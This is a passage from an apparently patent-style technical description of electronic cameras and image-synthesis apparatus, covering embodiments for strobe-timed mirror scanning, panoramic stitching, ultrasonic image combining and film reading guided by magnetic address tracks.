image-synthesizing circuit 295 comprises a fame memory A 217 and a shake-correcting circuit 218--both being identical to those described above. The electronic camera takes a picture of an object when the stroboscopic lamp 291 emits flashing light while the mirror 203a is rotating. FIG. 87A indicates the timing of driving the stroboscopic lamp 291. More precisely, FIG. 87A illustratesthe timing the stroboscopic lamp 291 is driven, or changes in the voltages the vertical scanning circuit 204-3 applies to the N vertical scanning lines. FIG. 87B shows part of the waveform of a voltage applied to the Nth vertical scanning line. Asevident from FIG. 87B, the voltage applied to each line is at the lowest level to expose the CMD 204 to light, at the intermediate level to read a pixel signal, and at the highest level to reset a pixel. Since the exposure timing and the signal-readingtiming differ from line to line, the stroboscopic lamp 291 is driven to emit flashing light for the vertical blanking period during which all pixels of the CMD 204a are exposed to light. The operation of the electronic camera shown in FIGS. 84 to 86 will be explained. When the photographer pushes the shutter-release button 299, the voice coil 290 rotates the mirror 203a and the stroboscopic lamp 291 emits flashing light at the time shown in FIG. 87A. The light is applied to the object through the polarizingfilter 292 and is reflected from the object. The reflected light is applied through the polarizing filter 293 to the mirror 203a. The mirror 203a reflects the light, which is applied to the CMD 204a through the imaging lens system 202. Due to the useof the polarizing filters 292 and 293, the light applied to the CMD 204a is free of straight reflection. The A/D converter 205 converts the pixel signals generated by the CMD 204a to digital signals. The digitizer 206 converts the digital signals to binary signals, which are input to the image-synthesizing circuit 295. The A/D converter 205 andthe digitizer 206 repeat their functions a predetermined number of times, whereby the circuit 295 produces image data representing an image. The data-compressing circuit 207 compresses the image data. The image data compressed by the circuit 207 iswritten into the memory card 297. Upon applying flashing light 15 times to the object, the electronic camera can form an image of the object which has high resolution of about 2000.times.3000 pixel. Since the mirror 203a is located between the object and the imaging lens system202, the resultant image is free of aberration, and no reduction in the ambient light occurs. Further, the two polarizing filters 292 and 293 prevent straight reflection of the light emitted from the stroboscopic lamp 291. Since the period for whichthe lamp 291 emits a beam of light is extremely short, the camera shakes so little, if it does at all, during the exposure period. Hence, each frame image is not displaced with respect to the next one even though the mirror 203a continues to rotate,whereby the resultant image is sufficiently clear. Once the image data is written into the memory card 297 which is portable, the data can easily be transferred to a printer or a personal computer. Even if the mirror 203a is rotated at uneven speed, the controller 298 need not control the voice coil 290 so precisely. This is because a shake-correcting circuit (not shown) detects the changes in the speed and compensates for these changes. An electronic camera, which is a twenty-sixth embodiment of the invention, will be described with reference to FIGS. 88 and 89 and FIGS. 90A and 90B. This embodiment is similar to the twenty-fifth embodiment shown in FIG. 84. The samecomponents as those shown in FIG. 84 are denoted at the same reference numerals in FIG. 88, and only the characterizing features of the twenty-sixth embodiment will be described in detail. In the electronic camera of FIG. 84, the flashing light emitted from the stroboscopic lamp 291 illuminates not only the object but also the background thereof. In other words, the light is applied to those areas outside the view field of thecamera. This is a waste of light. The electronic camera shown in FIG. 88 is designed to save light. To be more specific, a reflector 300 and a lens system 301 converge the flashing light from a stroboscopic lamp 291, producing a converged light beam. The light beam is appliedto a half mirror 302 and hence to a mirror 203a. The mirror 203a reflects the light beam to the object. The light reflected from the object is applied to the mirror 203a. The mirror 203a reflects the beam, which is applied to a CMD 204a through thehalf mirror 302 and an imaging lens system 202. Thus, the light is applied to the object, not being wasted. The half mirror 302 has a polarizing plate and can, therefore, remove positively reflected components from the light reflected from the object. In the case where the stroboscopic lamp 291 cannot be used, the mirror 203a may be intermittently rotated with such timing as is illustrated in FIG. 89. If the mirror 203a is rotated at one-frame intervals, however, the image data itemsrepresenting frame images may mix together. In the present embodiment, the mirror 203a is rotated at two-frame intervals (or longer intervals) so that the signals the CMD 204a generates during each exposure period A only may be supplied to theimage-synthesizing circuit (not shown) incorporated in a processing section 294. The signals the CMD 204a produces during each exposure period B are not used at all. Another electronic camera, which is a twenty-seventh embodiment of the invention, will be described with reference to FIGS. 90A and 90B. This camera is characterized in that, as shown in FIG. 90A, a spring 303, a cam 304a, and a connecting rod304b work in concert, rotating a mirror 203b intermittently. Alternatively, as shown in FIG. 90B, a gear 312a and a screw 312b in mesh with the gear 312a may be used for intermittently rotating the mirror 203b. In this case, a FIT (Flame Interline Transfer)-type CCD 204b is used instead of the CMD 204a. The screw 312b has a helical groove, each turn of which consists of a flat part and a driven part. As the screw 312b rotates at constant speed, the gear 312a is periodically rotated and stopped. The FIT-type CCD 204b has its even-numbered field and itsodd-numbered field exposed sub-stantially at the same time. The time during which to expose either field can be changed. FIG. 90C is a chart representing the timing at which exposure is performed, and the angle by which to rotate the mirror 203b, in the case where the mirror-driving mechanism shown in FIG. 90B is employed. As long as the gear 312a stays in meshwith any flat part of the helical groove of the screw 312b, the mirror 203b remains to rotate for some time (e.g., 10 ms). It is during this time that both the even-numbered field and the odd-numbered field are exposed to light. While the gear 312astays in engagement with any driven part of the helical groove, the mirror 203b is rotating for some time (e.g., 20 ms). During this time the signals produced by the exposure of the fields are supplied to a processing section 224. The gear 312a and the screw 312b easily transform the rotation of the shaft of a motor to the intermittent rotation of the mirror 203b. The mirror-driving mechanism of FIG. 90B makes less noise than the mechanism of FIG. 90A which comprises thecam 304a. By virtue of the mechanism shown in FIG. 90B, the frame-image data items are readily prevented from mixing together, and the illumination light is not wasted. The imaging device incorporated in the electronic cameras of FIG. 90B is the FIT-type CCD 204b. The CCD 204b can be replaced by a CMD, provided that the mirror 203b is rotated at two-frame intervals or longer intervals. An image processing apparatus according to a twenty-eighth embodiment of this invention will be described with reference to FIG. 91. This embodiment is characterized in that a TV camera is rotated to take frame images of an object, whereas themirror 203b is intermittently rotated for the same purpose in the twenty-seventh embodiment (FIGS. 90A, 90B, and 90C). In the twenty-eighth embodiment, too, the frame images combined into a single image. As FIG. 91 shows, the apparatus comprises a TV camera 305 such as a CCD camera, a processing section 294' which performs the same function as the section 294 shown in FIG. 84, a recording medium 306 such as a hard disk, a CRT monitor 221, and aprinter 222. The section 294' comprises an A/D converter 205, an image-synthesizing circuit 295, a memory 219, and a D/A converter 220. This apparatus is designed to form a gray-scale image, and the image signals output by the TV camera 305 are notconverted to binary ones. Another image processing apparatus, which is a twenty-ninth embodiment of the invention, will be described with reference to FIGS. 92, 93 and 94, FIGS. 95A and 95B, and FIG. 96. As can be understood from FIG. 92, this apparatus is similar to the apparatus of FIG. 91 and characterized in that an ultrasonic diagnosis apparatus 307 is used in place of the TV camera 305. The diagnosis apparatus 307 produces a convex-typeultrasonic sonic image. This image consists of a trapezoidal image of an object and background, as is illustrated in FIG. 94. The background, which is a region ineffective, must not be used in synthesizing images such as text data. More precisely,that portion of the left image, which overlaps the ineffective region of the right image as is shown in FIG. 95A, is not used in image synthesis. That portion of the right image, which overlaps the ineffective region of the left image, is not used inimage synthesis, either. The left and right images are combined by processing the pixel signals defining the overlap regions of the images as is illustrated in FIG. 96, that is, in the same way as in the first embodiment. FIG. 93 shows the imaging section of the twenty-ninth embodiment. The output of a memory A 217 is connected to a distance calculator 218a and an image-moving circuit 218b. The image-moving circuit 218b is connected to an edge-emphasizingcircuit 308 designed for effecting edge-emphasis on signals deteriorated due to interpolation. The circuit 308 is connected to a left-border detector 309 for detecting the left border of the right image, and also to an image-synthesizing circuit 311. The left-border detector 309 and a memory B 219 are connected to the image-synthesizing circuit 311. The memory A 217 stores image data representing the left image, whereas the memory B 219 stores image data representing the right image. The image-synthesizing circuit 311 writes two image data items into the memory B 219. The first data item represents that part of the the left image which is on the left of left border of the right image. The second data item represents thatpart of the right image which is on the right border of the left image. The circuit 311 processes the pixel signals defining the overlap regions of the left and right images, and writes the processed signals into the memory B 219. The imaging sectioncan therefore combine convex-type ultrasonic images appropriately. An electronic camera, which is a thirtieth embodiment of the invention, will be described with reference to FIGS. 97A, 97B and 97C and FIGS. 98 to 101. This camera is designed to take three images of an object which overlap one another as shownin FIG. 97A, and to combine the images into a panoramic image. To be more specific, each image is taken when its left edge, seen in the field of the view finder, adjoins the right edge of the image taken previously and displayed in the field of the viewfinder. As shown in FIG. 97B, the field of the view finder is comprised of displaying sections A and B. The section A is provided to display a right edge portion of the first image previously taken. The section B is used to display the second imagewhich adjoins the right edge portion of the first image displayed in the section A. In order to photograph the image 2 shown in FIG. 97A after the image 1 shown in FIG. 97A has been taken, a photographer pans the camera until the left edge of the second image adjoins that part of the first image which is shown in section A.Seeing the the left edge of the second image adjoining said part of the first image displayed in the section A, the photographer pushes the shutter-release button, photographing the image 2. The imaging section of the thirtieth embodiment will be described in detail, with reference to FIG. 97C. The imaging section comprises a lens 321 for focusing an input optical image, a CCD 322 for converting the image into electric imagesignals, a preamplifier 323 for amplifying the image signals, a signal processor 324 for performing .gamma. correction or the like on the image signals, an A/D converter 325 for converting the signals to digital image signals, and a color separator 326for separating each digital signal into a luminance signal Y and chrominance signals Cr and Cb. As FIG. 97C shows, an image-adding section 327 is connected to the output of the color separator 326 to receive the luminance signal Y. Also, a data compressor 328 is connected to the output of the color separator 326 to receive the luminancesignal Y and the chrominance signals Cr and Cb and compress data formed of these input signals. The image-adding section 327 comprises an overlap region memory 329, multipliers 330 and 331, a coefficient-setting circuit 332, and an adder 333. The memory 329 is provided for storing the image data representing an image previouslyphotographed. The coefficient-setting circuit 332 is designed to produce coefficients C1 and C2 to supply to the multipliers 330 and 331, respectively. In operation, a luminance signal Y is supplied to the image-adding section 327. The section 327 adds part of the image data stored in the memory 329 to the luminance signal Y. The resultant sum is supplied from the image-adding section 327 to aD/A converter 334. The coefficients C1 and C2 are "1" and "0, " respectively for the displaying section A (FIG. 97B), and are "0" and "1, " respectively, for the displaying section B (FIG. 97A). The output of the D/A converter 334 is connected to aview finder 335. The view finder 335 comprises a liquid-crystal display (LCD) 336 and an ocular lens 337. The data compressor 328 compresses the input signals Y, Cr, and Cb. The compressed signals are written into a memory card 339 at the same time the photographer pushes a shutter-release button 338. The memory card 339 can be removed from theelectronic camera. The shutter-release button 338 is a two-step switch. When the button 338 is depressed to the first depth, the camera measures the distance between itself and the object and also the intensity of the input light. When the button 338is pushed to the second depth, the camera photographs the object. A controller 340 is connected to the image-adding section 327 and also to the memory card 339, for controlling the section 327 and for controlling the supply of write addresses to thememory card 339. The operation of the electronic camera according to the thirtieth embodiment of the invention will now be explained. First, the photographer holds the camera at such a position that the left edge of an object is placed at the center of the field of the view finder 335. He or she then pushes the shutter-release button 338 to the first depth. Thedistance-measuring system and the photometer system (either not shown) operate to adjust the focal distance and the exposure time. The CCD 322 converts the first optical image 1 into image signals, which are amplified by the preamplifier 323. Thesignal processor 324 effects .gamma. correction or the like on the amplified image signals. The A/D converter 325 converts the output signals of the processor 324 to digital signals. The color separator 326 separates each digital image signal into aluminance signal Y and chrominance signals Cr and Cb. The signals Y, Cr, and Cb are input to the data compressor 328. When the photographer further pushes the shutter-release button 338 to the second depth, the data compressor 328 compresses the imagedata representing the first image 1, and the compressed image data is written into the memory card and stored in a prescribed storage area of the memory card 339. In the meantime, the image data representing the right part of the image 1 (i.e., the overlap region 1 shown in FIG. 97A) is stored into the overlap region memory 329. The adder 333 adds this image data to the image data representing the secondimage 2, generating combined image data. The D/A converter 334 converts the combined image data to analog image data, which is supplied to the LCD 336. The LCD 336 displays the image shown in FIG. 97B. As FIG. 97B shows, displayed in the region A isthe right edge of the image 1 which is represented by the image data stored in the overlap region memory 329; displayed in the region B is the second image 2 which is focused on the CCD 322 at present. The left edge of the image 2, which overlaps theright edge of the image 1 cannot be seen in the field of the view finder 335. The camera is then panned until the position where the images 1 and 2 properly adjoin each other appears in the field of the view finder 335. The photographer depresses the shutter-release button 338 completely, or to the second depth, uponjudging that the images 1 and 2 are connected appropriately. The image data of the image 2 now focused on the CCD 322 is is thereby written in a prescribed storage area of the memory card 338. Simultaneously, the right edge of the image 2, i.e., thearea 2 overlapping the third image 3, is written in the overlap region memory 329. Thereafter, the third image image 3 is photographed in the same way as the first image 1 and the second image 2. As a result, the three frame images 1, 2, and 3 are formed. Their overlap regions 1 and 2 (FIG. 97A) may be displaced from thedesirable positions. Such displacement can be compensated by the image-synthesis to be described later. The photographer need not pan the camera with so much care as to place the overlap region 1 or 2 at a desired position, and can therefore take manypictures within a short time. The images 1, 2, and 3 taken by the electronic camera shown in FIG. 97C are reproduced from the memory card 339 by the image-reproducing apparatus shown in FIG. 98. The image-reproducing apparatus comprises a data expander 341 for expanding theimage data items read from the memory card 339, an image-synthesizing circuit 342 for combining the expanded data items, a controller 343 for controlling the read address of the card 339 and the image-synthesizing circuit 342, a filing deice 344 forstoring synthesized images, a monitor 345 for displaying the synthesized images, and a printer 346 for printing the synthesized images. The image-synthesizing circuit 342 has the structure shown in FIG. 99. It comprises three frame memories 351, 352, and 353, displacement detectors 354 and 355, interpolation circuits 356 and 357, an image-synthesizing section 358, and a framememory 364. The frame memories 351, 352, and 353 store the data items representing the images 1, 2, and 3, respectively. The displacement detectors 354 and 355 detect the displacement of the overlap regions 1 and 2 from the image data items read fromthe frame memories 351, 352, and 353. The detector 354 calculates the parallel displacement S1 and rotation angle R1 of the second image 2, with respect to the first image 1. Similarly, the detector 355 calculates the parallel displacement S2 androtation angle R2 of the third image 3, with respect to the second image 2. The displacement S1 and the angle R1 are input to the interpolation circuit 356, and the displacement S2 and the angle R2 to the interpolation circuit 357. The interpolation circuit 356 interpolates the pixel signals read from the second frame memory 352 and representing the second image 2, thereby producing a data item showing an image appropriately adjoining the first image 1. The interpolationcircuit 357 interpolates the pixel signals read from the third frame memory 353 and representing the third image 3, thereby producing a data item representing an image properly adjoining the second image 2. The image data items produced by the circuits356 and 357 are input to the image-synthesizing section 358. As shown in FIG. 99, the image-synthesizing section 358 comprises multipliers 359, 360, and 361, a coefficient-setting circuit 362, and an adder 363. The circuit 362 is designed to produce coefficients a, b, and c for the images 1, 2, and 3,respectively. The coefficients a, b, and c linearly change in the overlap regions 1 and 2 as is illustrated in FIG. 100. The image-synthesizing section 358 calculates values for the pixel signals defining the image which the image-synthesizing circuit342 is to output. These values are stored, in the form of image data, into the frame memory 364. The image data representing the combined image is read from the frame memory 364, and is supplied to the filing deice 344, the monitor 345, and the printer 346--all incorporated in the image-reproducing apparatus shown in FIG. 98. Hence, thesynthesized, panoramic image is thereby recorded by the filing device 344, displayed on the monitor 345, and printed by the printer 346. The image-reproducing apparatus, which combines the frame images produced by the electronic camera (FIG. 97C), may be built within the electronic camera. In the thirtieth embodiment, only the right edge of the image previous taken is displayed in the section A of the view-finder field, while the image being taken is displayed in the section B of the view-finder field. Instead, both images may bedisplayed such that they overlap in the display section A. To accomplish this it suffices for the photographer to operate the coefficient-setting circuit 362, thereby setting the coefficients C1 and C2 at 0.5 for the display section A and at 1 and 0,respectively, for the display section B, and to pan the camera such that the second image overlaps, in part, the first image displayed in the section B. Thus, the photographer can take images overlapping in a desired manner, at high speed. The signals supplied to the LCD 336 are exclusively luminance signals Y, and the images the LCD 336 can display are monochromic. Nonetheless, the LCD 335 may be replaced by a color LCD. The color LCD, if used, may display the two images indifferent colors so that they may be distinguished more clearly than otherwise. Further, the image signals read from the overlap region memory 329 may be input to an HPF (High-Pass Filter) 365 and be thereby subjected to high-pass filtering, such as aLaplacian operation, as is illustrated in FIG. 101, the two frame images can be more easily overlapped in a desired manner. As has been described, the thirtieth embodiment is designed to take three frame images by panning the camera and to combine them into a panoramic image. Instead, four or more frame images may be combined into a single wider image. Still another electronic camera, which is a thirty-first embodiment of this invention, will now be described with reference to FIGS. 102 and 103. This electronic camera is similar to the camera (FIG. 97C) according to the thirtieth embodiment ofthe invention. Hence, the same components as those shown in FIG. 97C are designated at the same reference numerals in FIG. 102, and will not be described in detail. The camera shown in FIG. 102 is characterized in three respects. First, a correlator 371 is used which finds the correlation between the image data read from the overlap region memory 329 and the data representing the image being taken, therebyto calculate the displacement of the image with respect to the image previously taken. Second, an arrow indicator 372 is incorporated in the view finder 335, for indicating the displacement calculated by the correlator 371. Third, an audio outputdevice 373 is incorporated to generate a sound or a speech informing a photographer of the direction in which the camera is being moved. The arrow indicator 372 displays an arrow in the field of the view finder 335. The arrow may extend upwards, downwards, to the left, or to the right, indicating how much the image is displaced in which direction, with respect to as FIG. 103shows, the image previously taken. The indicator 372 has a light source 374 which emits red light and blue light. If the correlation the correlator 371 has calculated has a very small value (indicating that the two frame images do not overlap), the light source 374 emits red light. In the case where the correlation has been correctly detected, determiningthe displacement of the second image with respect to the first, then the indicator 372 displays a arrow extending in the direction the first image is displaced. The camera is moved to bring the second image to a position where the image properlyoverlaps the first image, thus reducing the displace to substantially "0." At this time, the light source 374 emits blue light. Not only is an arrow displayed in the field of the view finder 335, but also the audio output device 373 gives forth an audio message, as "Pan the camera to the right!" or "Pan the camera to the left!," instructing the photographer to pan thecamera in that direction. If the displacement is large, the device 373 may generate a message "Pan the camera much to the left!" or a message "Pan the camera a little to the right." Alternatively, the arrow indicator 372 may display a blinking arrowindicating that the second image is displaced excessively. A thirty-second embodiment of the present invention will be described with reference to FIGS. 104A and 104B. In this embodiment, nine frame images overlapping one another as shown in FIG. 104A are combined into a large single image. Thenumerals shown in FIG. 104A indicate the order in which the images are photographed. To take the image 5, a photographer moves the camera so that the LCD of the view finder displays the images 2, 4 and 5 at such positions as is shown in FIG. 104B. Whenthe upper and right edges of the image 5 appropriately overlap the lower edge of the image 2 and the left edge of the image 4, respectively, the photographer depresses the shutter-release button, thereby taking the image 5. Since the LCD displays not only a frame image located on the left or right side of the target image, but a frame located above or below the target image, it is possible with the thirty-second embodiment to photograph many frame images arranged inboth the horizontal direction and the vertical direction, overlapping one another. To achieve this multi-image photographing, the imaging section (not shown) of this embodiment needs an overlap region memory which has a greater storage capacity than theoverlap region memory 329 used in the thirtieth embodiment (97C.) An image processing apparatus according to a thirty-third embodiment of the invention will be described, with reference to FIGS. 105A and 105B. This embodiment is a data-reading apparatus for reading data from a flat original. As is shown inFIG. 105A, the imaging section 376 of the apparatus is attached to a stay 374 protruding upwards from a base 376 and located above the base 376. A shutter-release button 377 is mounted on the base 376. When the button 376 is pushed, the imaging section375 photographs the image data of an original placed on the base 376. The imaging section 375 has a view finder 378. A memory card 379 is removably inserted into the imaging section 375. A photographer does not move the imaging section 375 as in the thirtieth embodiment. Rather, he or she moves the original on the base 376 and takes frame images of the original. The photographer pushes the shutter-release button when he or shesees the target part of the original is displayed in the field of the view finder 378. An XY stage 380 may be mounted on the base 376 as is illustrated in FIG. 105B, and the original may be placed on the XY stage 380. In this case, the stage 380 can be automatically moved along the X axis and the Y axis in accordance with thedisplacement which the correlator 371 has calculated and which the frame image being taken has with respect to the frame image previously taken. In other words, the photographer is not bothered to move the original to locate the image of the desiredpart of the original in the field of the view finder 378. Alternatively, a drive mechanism (not shown) may drive the stay 374 along the X axis and the Y axis in accordance with the displacement which the correlator 371 has calculated. To identify each image taken, a numeral or any ID mark may be superimposed on the image. Further it is possible for the photographer to operate a switch on the imaging section 375, displaying, in the view-finder field, all frame images takenthus far of an original, so that he or she may recognize what a single combined image would look like. Still further, the CCD incorporated in the imaging section 375 may be replaced by a line sensor. Another image processing apparatus, which is a thirty-fourth embodiment of this invention, will be described with reference to FIGS. 106 to 108 and FIGS. 109A to 109C. This embodiment is a modification of the film-editing apparatus shown in FIG.63, which uses photographic film. The film-editing apparatus shown in FIG. 106 uses a special type of photographic film 401. As FIG. 107 shows, the film 401 has a series of imaging areas 425 and two series of magnetic tracks 426 extending along the perforations, or along theedges of the imaging areas 425. An address signal of the type shown in FIG. 108, consisting of 0s and 1s, is recorded on each magnetic track 426. In this embodiment, the image formed in each imaging area 425 of the film 401 is divided into three images425a, 425b, and 425c, as is shown in FIGS. 109A, 109B, and 109C. These images 425a, 425b, and 425c will be detected by an imaging device (later described). As can be understood from FIG. 106, a controller 33 controls a motor controller 407, which in turn drives an electric motor 402. The motor 402 rotates the film take-up shaft, whereby the film 401 loaded in a film-feeding mechanism 431 is takenup around the take-up shaft. Two magnetic heads 427a and 427b are in contact with the film 401 to read the address signals from the magnetic tracks 426 of the film 401. A light source 403 is located near the film 401, for applying image-reading lightto the film 401. The optical image read from each imaging area 425 of the film 401 is focused on a CMD 405a, i.e., a solid-state imaging device, by means of an optical system 404. (The CMD 405a is used since it can be shaped relatively freely.) The CMD 405aconverts the input optical image into image signals, which are amplified by a preamplifier 10. An A/D converter 14 converts the amplified signals to digital signals, which are input to a signal processor (SP) 20. The converter 20 generates three dataitems representing the images 425a, 425b, and 425c, respectively. These image data items are stored into frame memories 22a, 22b, and 22c, respectively. A low-pass filter (LPF) may be connected between the preamplifier 10 and the A/D converter 14, for removing noise components from the amplified image signals. Further, a FPN (Fixed Pattern Noise)-removing circuit may be incorporated in the CMD405a. Meanwhile, the address signals read by the magnetic heads 427a and 427b are supplied to counters 428 and 429, which count these signals. When the count of either counter reaches a predetermined value, the controller 33 causes the motorcontroller 407 to stop the motor 402, terminating the take-up of the film 401. The count values of both counters 428 and 429 are input to a displacement-determining circuit 430. The circuit 430 determines the displacement of the film with respect to aprescribed position, from the count values the counters 428 and 429 have when the film take-up is stopped. The displacement is defined by a rotation angle R and a parallel displacement S, which have been calculated in the same method as has beenexplained in connection with the first embodiment of the present invention. The controller 33 controls the frame memories 22a, 22b, and 22c, reading the image data items therefrom to an image-synthesizing circuit 408. The circuit 408 combines the input image data items in accordance with the rotation angle R and theparallel displacement S which have been detected by the displacement-determining circuit 430. As a result, the image recorded in each imaging area 425 of the film 401 is reconstructed in the same way as has been explained in conjunction with the firstembodiment of the invention. The image data representing the image reconstructed by the circuit 408 is input to a display 409, a data storage 410, or a printer 411. It will now be explained how the film-editing apparatus of FIG. 106 performs its function. First, the film 401 is loaded into the film-feeding mechanism 431 and is taken up around the take-up shaft. In the process, the counters 428 and 429 count address signals the magnetic heads 427a and 427b read from the magnetic tracks 426. When the count of either counter reaches the predetermined value, the film-feeding mechanism 431 is stopped, and the magnetic heads 427a and 427b move relative to the film 401 to positions B, when the film 401 is stopped--as is shown in FIG.109A. Next, the light source 403 applies light to the film 401, reading a first part of the image recorded in the imaging area 425 of the film 401. The optical system 404 focuses the image, thus read, on the CMD 405a. The CMD 405a converts the inputoptical image into image signals, which are processed by the preamplifier 10, the A/D converter 14, and the signal processor 20, into an image data item representing the first part of the image. This image data item is written into the frame memory 22a. Thereafter, the magnetic heads 427a and 427b move relative to the film 401 to position C, when the film 401 is stopped, and then the heads 427a and 427b move relative to the film 401 to position D--as is illustrated in FIG. 109b. The lightsource 403, the optical system 404, the CMD 405a, the preamplifier 10, the A/D converter 14, and the signal processor 20 operate in the same way as described in the preceding paragraph. As a result, two image data items representing the second and thirdparts of the image are stored into the frame memories 22b and 22c, respectively. Next, the three data items are read from the frame memories 22a, 22b, and 22c and supplied to the image-synthesizing circuit 408. The circuit 408 combines the input data items, thus reconstructing the image recording in the imaging area 425 ofthe film 401--in accordance with the displacement data items (each consisting of R and S) produced by the displacement-determining circuit 430. The three parts of image shown in FIG. 109B are those which would be read from the film 401 if the film 401 stopped at desired positions. In practice, the parts of the image assume positions B', C', and D' shown in FIG. 109C, displaced withrespect to one another. This is inevitable because the film 401 cannot stop at the desired positions due to the inertia of the film-feeding mechanism 431. If any image part assumes an undesirable position when the film 401 is stopped, the actual count of each counter is either greater or less than the predetermined value. The difference in count is equivalent to a motion vector detected andutilized in any embodiment described above that incorporates correlator or correlators. The displacement-determining circuit 430 can accurately calculate the rotation angle R and the parallel displacement S from that difference in count, and theimage-synthesizing circuit 408 can combine the image parts with high precision. Because of the photographic film 401 with address signals recorded on it, the circuit 430 can accurately calculate the displacements of image parts even if the image parts are low-contrast ones, unlike a correlator. Supplied with thedisplacement calculated by the displacement-determining circuit 430, the image-synthesizing circuit 408 can reconstruct a high-resolution image from the image data output by the CMD 405a, thought the CMD 405a is a relatively small solid-state imagingdevice. Nonetheless, the displacement-determining circuit 430 may replaced by a correlator. In this case, the correlator calculates the motion vector from the positions which the perforations of the film 401 assumes relative to the CMD 405a. A film-editing apparatus, which is a thirty-fifth embodiment of the present invention, will be described with reference to FIGS. 110 and 111. This apparatus is similar to the thirty-fourth embodiment shown in FIG. 106. The same components asthose shown in FIG. 106 are, therefore, designated at the same reference numerals in FIG. 110, and will not be described in detail. This apparatus is characterized in that each of three parts of an image read from a photographic film 401 is divided into three parts by a half mirror 433, and nine data items representing the resulting nine image parts are combined, therebyreconstructing the original image read from the film 401. In operation, the image part 425a shown in FIG. 109B read from the film 401 is applied by an optical system 404 to the half mirror 433. The mirror 433 divides the input image into three, which are applied to three CCDs 432a, 432b, and 432c. TheCCDs 432a, 432b, and 432c convert the input three image parts into three data items, which are input to an image pre-synthesizing circuit 434. The circuit 434 combines the three data items into a single data item which represents one of the three partsof the image read from the film 401. The circuit 434 combines two other sets of three data items representing the image parts 425b and 425c shown in FIG. 109B, thereby producing two data items which represent the two other parts of the image read fromthe photographic film 401. The three data items produced by the image pre-synthesizing circuit 434 are stored into three frame memories 22a, 22b, and 22c, respectively. These data items are read from the frame memories 22a, 22b, and 22c and input to an image-synthesizing circuit 408. The circuit 408 combines the three input data items in accordance with the displacement data items R and S which adisplacement-determining circuit 430 has generated from the counts of counters 428 and 429, as in the thirty-fourth embodiment. A single image identical to the original image is thereby reconstructed. Reconstructed from nine image parts, the resultantimage has a resolution higher than the image reconstructed by the thirty-fourth embodiment (FIG. 106). Another film-editing apparatus, which is a thirty-sixth embodiment of the invention, will be described with reference to FIGS. 112 and 113. This apparatus is similar to the thirty-fifth embodiment of FIG. 110. The same components as those shownin FIG. 106 are denoted at the same reference numerals in FIG. 111, and will not be described in detail. The thirty-sixth embodiment is characterized in that the address signals recorded in the magnetic tracks 426 of photographic film 401 are used to control a film-feeding mechanism 431 such that the three parts of each frame image recorded on thefilm 401 are located at desired positions (i.e., positions A, B, and C specified in FIGS. 109A and 109B) with respect to a CMD 405a. Hence, three address signals recorded for every frame image. In this embodiment, the film 401 with the address signals recorded on it is loaded in the film-feeding mechanism 431, and magnetic heads 435a and 435b contacting the film 401 can be moved along the magnetic tracks of the film 401 by means ofdrive sections 436a and 436b which are controlled by a controller 33. In operation, the film 401 loaded in the film-feeding mechanism 431 is taken up under the control of the controller 33. When the magnetic heads 435a and 435b detect the first of the three address signals recorded for every frame image, themechanism 431 stops the film 401. The first image part is stopped not at the desired position A (FIG. 109A), but at a more forward position, inevitably because of the inertia of the film-feeding mechanism 431. Nonetheless, the controller 33 controlsthe drive sections 436a and 436b such that the drive sections move the heads 435a and 435b to the first image part. The distances the heads 435a and 435b are moved are detected by position-determining circuits 437a and 437b, which generate signalsrepresentative of these distances. The signals are input to a displacement-determining circuit 430. The circuit 430 calculates a rotation angle R and a parallel displacement S from the input signals. The three image data items, which the CMD 405aproduces in the same way in the thirty-fourth embodiment, are stored into three frame memories 22a, 22b, nd 22c and eventually input to an image-synthesizing circuit 408. The circuit 408 combines the three data items into a single image, in accordancewith the angle R and displacement S which have been supplied from the displacement-determining circuit 430. In the thirty-fourth, thirty-fifth, and thirty-sixth embodiments, a photographic film is intermittently stopped, each time upon counting a predetermined number of address signals read from the film, and the displacement (i.e., a rotation angle Rand a parallel displacement S) of each image part with respect to another image part is calculated from the difference between said pre-determined number of address signals and the number of address signals counted the moment the film 401 is actuallystopped. The data items representing the image parts are corrected in accordance with the displacement data (R and S) and then are combined, thereby reconstructing an image. In the thirty-fourth, thirty-fifth and thirty-sixth embodiments, the overlap regions of the image parts are located by various methods, not by processing the data items representing the image parts as in the conventional image processingapparatuses. These embodiments can therefore accurately calculate the displacements of the image parts, not requiring complex components which will raise the manufacturing cost. Further, these embodiments, though simple in structure, can position theimage parts with high precision, thereby reconstructing an original image, even if the image parts have low contrast and their relative position cannot be well determined by a correlator. In the thirty-sixth embodiment, wherein address signals of the type shown in FIG. 113 are used, other data pulses can be added between any two adjacent pulses defining the positions where to stop the film 401 intermittently. As described above, in the thirty-fourth, thirty-fifth and thirty-sixth embodiments, the overlap regions of image parts are detected by using the positioning pulses read from the photographic film. These embodiments can therefore reconstruct anoriginal image with high precision. An image processing apparatus according to a thirty-seventh embodiment of the invention will be described with reference to FIGS. 114 and 115, FIGS. 116A and 116B, and FIGS. 117 to 121. In the thirty-seventh embodiment, an input optical image is applied through an optical system 502 to a color-separating prism 503. The prism 503 is, for example, a dichroic mirror for separating the input image into a red beam, a green beam, anda blue beam. These beams are applied to three CCDs 503r, 503g, and 503b, respectively. The CCDs 503r, 503g, and 503b are driven by a CCD driver 516, and convert the red beam, the green beam, and the blue beam into image signals. The image signals areinput to preamplifiers 504r, 504g, and 504b and are thereby amplified. The amplified signals are supplied to A/D converters 505r, 505g, and 505b, respectively, and are converted thereby to digital signals. The digital signals are input to signalprocessors (SP) 506r, 506g, and 506b, which perform .gamma. correction, edge-emphasis, or the like on the input digital signals. The signals output by the signal processors 506r, 506g, and 506b are stored into frame memories 507r, 507g, and 507b. The image signals read from the frame memories 507r, and 507b are input to interpolation circuits 508r and 508b. The circuits 508r and 508b interpolate each red-pixel signal and each blue-pixel signal which correspond to one green-pixel signal,in accordance with the coefficients read from coefficient memories 509r and 509b, which will be described later. The interpolation circuits 508r and 508b are identical in structure, and only the circuit 508r will be described in detail. As FIG. 115 shows, the circuit 508r comprises a data-reading circuit 521 and a linear interpolation circuit 522. Thecircuit 521 reads the values of four pixels, V.sub.b, B.sub.c, V.sub.d, and V.sub.e, from the frame memory 507r in accordance with the coordinates (IC.sub.x, IC.sub.y) read from the coefficient memory 509r. The linear interpolation circuit 522 comprisesmultipliers 523, 524, 525, and 526 and an adder 527. The multiplier 523 multiplies the pixel value V.sub.b by the interpolation coefficient C.sub.b read from the coefficient memory 509r; the multiplier 524 multiplies the pixel value V.sub.c by theinterpolation coefficient C.sub.c read from the coefficient memory 509r; the multiplier 525 multiplies the pixel value V.sub.d by the interpolation coefficient C.sub.d read from the coefficient memory 509r; and the multiplier 526 multiplies the pixelvalue V.sub.e by the interpolation coefficient C.sub.e read from the 